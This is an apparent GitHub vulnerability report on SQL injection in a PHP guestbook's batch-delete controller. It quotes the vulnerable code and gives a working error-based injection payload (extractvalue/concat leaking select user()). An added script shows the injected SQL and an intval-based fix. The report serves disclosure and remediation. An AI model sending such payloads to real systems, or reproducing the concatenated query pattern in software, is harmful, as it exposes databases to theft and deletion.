\App\Manage\Controller\GuestbookController.class.php has SQL injection #7

Open

maoqingya opened this issue Nov 28, 2021 · 0 comments

Comments

maoqingya commented Nov 28, 2021

\App\Manage\Controller\GuestbookController.class.php

lines 188-219:

public function delall(){
    //dump($_POST);
    //exit;
    $m=D('Guestbook'); // database table; the table prefix is set in the config file, so it is not needed here
    $id = I('post.id');
    //dump($id);
    //exit;
    if ($id==null){
        $this->error('Please select items to delete!');
    }
    // check whether id is an array or a single value
    if(is_array($id)){
        $where = 'id in('.implode(',',$id).')';
        // implode() returns a string made by joining the array elements
    }else{
        $where = 'id='.$id;
    }
    //dump($where);
    //exit;
    $count=$m->where($where)->delete(); // use save() to update a record
    if ($count>0){
        $this->success("Successfully deleted {$count} record(s)!");
    }
    else {
        $this->error('Batch delete failed!');
    }

}

}

This is SQL injection.
POC:
http://127.0.0.1/index.php/Guestbook/Index/delal

POST:id=1%20and%20(extractvalue(1,concat(0x7e,(select%20user()),0x7e)))

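The root cause is visible in the snippet: both branches of `delall()` splice the raw `id` value from the POST body straight into the `where()` string, and ThinkPHP's default `I()` filter (`htmlspecialchars`) does not touch the spaces, commas and parentheses that the payload needs. The following standalone PHP script is an added example, not code from the project or from the issue author. It reproduces the where-clause construction as a plain function so the resulting SQL fragment can be inspected with the POC payload, and shows a hardened replacement that coerces every id to an integer before anything reaches the query. The helper names (`vulnerable_where`, `safe_ids`) and the ThinkPHP 3.2 array-condition call shown in the trailing comment are assumptions for illustration and were not tested against this project.

```php
<?php
// Added example, not part of the original project.
// The original where-clause logic from delall(), extracted verbatim into a
// function so the produced SQL fragment can be printed and examined.
function vulnerable_where($id) {
    if (is_array($id)) {
        return 'id in(' . implode(',', $id) . ')';
    }
    return 'id=' . $id;
}

// Hardened variant (hypothetical helper): cast every id to an integer
// before it is used. Anything non-numeric collapses to 0 and is dropped,
// so only digits can ever end up in the query.
function safe_ids($id) {
    $ids = array_map('intval', (array) $id);
    $ids = array_filter($ids, function ($n) { return $n > 0; });
    return array_values($ids);
}

// Constructed input: the payload from the POC above, as I('post.id') would
// hand it over after its default htmlspecialchars filter.
$payload = '1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))';

echo vulnerable_where($payload), "\n";
// id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))
// The whole expression is appended to DELETE ... WHERE unchanged, so the
// extractvalue() error message carries back the result of select user().

// The array branch is no better: each element is joined in raw.
echo vulnerable_where(array('1', '2) or (1=1')), "\n";
// id in(1,2) or (1=1)

// With the hardened helper the trailing SQL is discarded by intval():
var_dump(safe_ids($payload));           // array(0 => 1)
var_dump(safe_ids(array('3', '7 or 1=1'))); // array(0 => 3, 1 => 7)
var_dump(safe_ids('abc'));              // array() -> caller should error out

// Assumed controller usage with ThinkPHP 3.2 array conditions (not taken
// from the project; shown as the intended replacement for the string where):
//   $ids = safe_ids(I('post.id'));
//   if (empty($ids)) { $this->error('Please select items to delete!'); }
//   $count = $m->where(array('id' => array('in', $ids)))->delete();
```

The integer cast is the essential step; passing an array condition to `where()` instead of a concatenated string lets the framework quote the values, but on its own it would still not stop a non-numeric id from being sent, so both changes belong together.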